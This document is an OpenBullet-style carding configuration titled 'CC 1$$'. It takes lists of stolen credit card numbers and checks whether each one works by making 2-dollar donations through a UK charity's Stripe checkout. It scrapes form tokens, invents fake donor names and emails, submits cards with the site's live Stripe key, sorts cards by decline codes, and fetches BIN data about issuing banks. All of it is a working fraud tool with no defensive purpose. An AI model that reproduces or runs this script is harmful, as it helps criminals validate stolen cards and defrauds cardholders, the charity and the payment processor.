[SETTINGS]
{
  "Name": "??--????-??????????????_????",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2022-01-23T20:50:47.0532523+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "☢️🔱ⓁⓊⒸⒾⒻⒺⓇ🔱",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "CC$",
  "AllowedWordlist2": "CC$",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "CC 1$$",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#ua FUNCTION GetRandomUA -> VAR "ua" 

#Tokens REQUEST GET "https://signhealth.org.uk/get-involved/donate/" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: none" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: <u>" 

#nonce PARSE "<SOURCE>" LR "<input type=\"hidden\"  name=\"give-form-hash\" value=\"" "\"" -> VAR "nonce" 

#Chose_2$ REQUEST POST "https://signhealth.org.uk/wp/wp-admin/admin-ajax.php?payment-mode=stripe_checkout" 
  CONTENT "action=give_load_gateway&give_total=2.00&give_form_id=74361&give_form_id_prefix=74361-1&give_payment_mode=stripe_checkout&nonce=<nonce>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "origin: https://signhealth.org.uk" 
  HEADER "referer: <ADDRESS>" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: <ua>" 
  HEADER "x-requested-with: XMLHttpRequest" 

#First FUNCTION RandomString "?l?l?l?l?l" -> VAR "first" 

#Last FUNCTION RandomString "?l?l?l?l?l" -> VAR "last" 

#Email FUNCTION RandomString "<first>.<last>?d?d?d%40gmail.com" -> VAR "email" 

#Put_Info REQUEST POST "https://signhealth.org.uk/wp/wp-admin/admin-ajax.php" 
  CONTENT "give-honeypot=&give-form-id-prefix=74361-1&give-form-id=74361&give-form-title=Donate&give-current-url=https%3A%2F%2Fsignhealth.org.uk%2Fget-involved%2Fdonate%2F&give-form-url=https%3A%2F%2Fsignhealth.org.uk%2Fget-involved%2Fdonate%2F&give-form-minimum=2.00&give-form-maximum=999999.99&give-form-hash=<nonce>&give-price-id=custom&give-recurring-logged-in-only=&give-logged-in-only=1&_give_is_donation_recurring=0&give_recurring_donation_details=%7B%22give_recurring_option%22%3A%22yes_donor%22%7D&give-amount=2.00&give_stripe_payment_method=&payment-mode=stripe_checkout&give_first=<first>&give_last=<last>&give_email=<email>&give_mailchimp_signup=on&give_gift_check_is_billing_address=no&give_gift_aid_address_option=billing_address&give_gift_aid_billing_country=GB&give_gift_aid_card_address=&give_gift_aid_card_address_2=&give_gift_aid_card_city=&give_gift_aid_card_state=&give_gift_aid_card_zip=&give_action=purchase&give-gateway=stripe_checkout&action=give_process_donation&give_ajax=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "origin: https://signhealth.org.uk" 
  HEADER "referer: https://signhealth.org.uk/get-involved/donate/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: <ua>" 
  HEADER "x-requested-with: XMLHttpRequest" 

IF "<SOURCE>" contains "success"
SET STATUS SUCCESS
ELSE
SET STATUS RETRY "RETRY"
ENDIF

#Payement_Page REQUEST POST "https://signhealth.org.uk/get-involved/donate/?payment-mode=stripe_checkout&form-id=74361" 
  CONTENT "give-honeypot=&give-form-id-prefix=74361-1&give-form-id=74361&give-form-title=Donate&give-current-url=https%3A%2F%2Fsignhealth.org.uk%2Fget-involved%2Fdonate%2F&give-form-url=https%3A%2F%2Fsignhealth.org.uk%2Fget-involved%2Fdonate%2F&give-form-minimum=2.00&give-form-maximum=999999.99&give-form-hash=<nonce>&give-price-id=custom&give-recurring-logged-in-only=&give-logged-in-only=1&_give_is_donation_recurring=0&give_recurring_donation_details=%7B%22give_recurring_option%22%3A%22yes_donor%22%7D&give-amount=2.00&give_stripe_payment_method=&payment-mode=stripe_checkout&give_first=<first>&give_last=<last>&give_email=<email>&give_mailchimp_signup=on&give_gift_check_is_billing_address=no&give_gift_aid_address_option=billing_address&give_gift_aid_billing_country=GB&give_gift_aid_card_address=&give_gift_aid_card_address_2=&give_gift_aid_card_city=&give_gift_aid_card_state=&give_gift_aid_card_zip=&give_action=purchase&give-gateway=stripe_checkout" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "origin: https://signhealth.org.uk" 
  HEADER "referer: https://signhealth.org.uk/get-involved/donate/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: <ua>" 

#sessionId PARSE "<SOURCE>" LR "sessionId: '" "'" -> VAR "sessionId" 

#Link PARSE "<ADDRESS>" LR "" "" -> VAR "link" 

#Full_Name FUNCTION Constant "<first>+<last>" -> VAR "full" 

#Zip FUNCTION RandomNum "10000" "11000" -> VAR "zip" 

#year FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "2020" VALUE "20" 
  KEY "2021" VALUE "21" 
  KEY "2022" VALUE "22" 
  KEY "2023" VALUE "23" 
  KEY "2024" VALUE "24" 
  KEY "2025" VALUE "25" 
  KEY "2026" VALUE "26" 
  KEY "2027" VALUE "27" 
  KEY "2028" VALUE "28" 
  KEY "2029" VALUE "29" 
  KEY "2030" VALUE "30" 
  KEY "2031" VALUE "31" 
  "<ano>" -> VAR "yer" 

#Guid FUNCTION GenerateGUID -> VAR "guid" 

#Muid FUNCTION GenerateGUID -> VAR "muid" 

#Sid FUNCTION GenerateGUID -> VAR "sid" 

#PAYMENTS_ REQUEST POST "https://api.stripe.com/v1/payment_methods" 
  CONTENT "type=card&card[number]=<cc>&card[cvc]=<cvv>&card[exp_month]=<mes>&card[exp_year]=<ano>&billing_details[name]=<full>&billing_details[email]=<email>&billing_details[address][country]=US&billing_details[address][postal_code]=<zip>&guid=<guid>&muid=<muid>&sid=<sid>&_stripe_account=acct_198APmG0VehpQZPS&key=pk_live_SMtnnvlq4TpJelMdklNha8iD&payment_user_agent=stripe.js%2F558e252d7%3B+stripe-js-v3%2F558e252d7%3B+checkout" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "origin: https://checkout.stripe.com" 
  HEADER "referer: https://checkout.stripe.com/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: <ua>" 

#Pm PARSE "<SOURCE>" JSON "id" -> VAR "tok" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "id" 
  KEYCHAIN Failure OR 
    KEY "error" 

#Confirm REQUEST POST "https://api.stripe.com/v1/payment_pages/<sessionId>/confirm" 
  CONTENT "eid=NA&payment_method=<tok>&expected_amount=200&expected_payment_method_type=card&_stripe_account=acct_198APmG0VehpQZPS&key=pk_live_SMtnnvlq4TpJelMdklNha8iD" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "origin: https://checkout.stripe.com" 
  HEADER "referer: https://checkout.stripe.com/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: <ua>" 

#Message PARSE "<SOURCE>" JSON "message" CreateEmpty=FALSE -> CAP "MSG" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your card number is incorrect." 
    KEY "Your card has expired" 
    KEY "expired_card" 
    KEY "Card is declined" 
    KEY "Your card does not support this type of purchase" 
    KEY "card_not_supported" 
    KEY "Your card is not supported." 
    KEY "Payment cannot be processed, missing card number" 
    KEY "transaction_not_allowed" 
    KEY "Your card was declined." 
    KEY "incorrect_number" 
    KEY "service_not_allowed" 
    KEY "do_not_honor" 
    KEY "generic_decline" 
    KEY "paraneter_invaild_empty" 
    KEY "lock_timeout" 
    KEY "Card is declined by your bank, please contact them for additional primaryrmation." 
    KEY "fraudulent" 
    KEY "was not found on this server." 
    KEY "paraneter_invaild_integer." 
    KEY "Your Card was declined" 
    KEY "Your card's expiration year is invaild." 
    KEY "Your account cannot currently make live charges." 
    KEY "invalid_request_error" 
    KEY "card_declined" 
  KEYCHAIN Success OR 
    KEY "\\status\": \\succeeded\"" 
    KEY "Thank you" 
    KEY "Payment successful" 
    KEY "Thank you for Your Donation!" 
    KEY "Your donation is currently processing." 
    KEY "\"cvc_check\": \"pass\"" 
    KEY "\"state\": \"succeeded\"" 
  KEYCHAIN Retry OR 
    KEY "This object cannot be accessed right now because another API resquest or Stripe process is currently accessing " 
    KEY "An error occurred while processing your card. Try again in a little bit." 
    KEY "We're sorry, but we're unable to serve your resquest." 
    KEY "Contains The zip or postal code for your billing address." 
    KEY "The zip code you supllied failed vaildation" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Your card has insufficient funds" 
    KEY "Your card's security code is incorrect" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "stolen_card" 
    KEY "last_card" 
    KEY "three_d_secure_redirect" 

#GET_INFO REQUEST GET "https://lookup.binlist.net/<cc>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#APPROVADA FUNCTION Constant "Donation Amount 2$" -> CAP "✅Approvada✅" 

#CARD_TYPE PARSE "<SOURCE>" LR "scheme\":\"" "\"," CreateEmpty=FALSE -> CAP "Scheme" "🔱" "☢️" 

#TYPE_OF_CARD PARSE "<SOURCE>" LR "type\":\"" "\"," CreateEmpty=FALSE -> CAP "Type" "🔱" "☢️" 

#COUNTRY PARSE "<SOURCE>" LR "\"name\":\"" "\"," CreateEmpty=FALSE -> CAP "Ip" "🔱" "☢️" 

#EMOJI PARSE "<SOURCE>" LR "emoji\":\"" ",\"" CreateEmpty=FALSE -> CAP "Emoji" "🔱" "☢️" 

#CURRENCY PARSE "<SOURCE>" LR "currency\":\"" "\"," CreateEmpty=FALSE -> CAP "Currency" "🔱" "☢️" 

#BANK PARSE "<SOURCE>" LR ",\"bank\":{\"name\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Bank" "🔱" "☢️" 

#CHECKED_BY_@luci5er_99 FUNCTION Constant "☢️🔱ⓁⓊⒸⒾⒻⒺⓇ🔱☢️" -> CAP "✅CHECKED BY✅" 

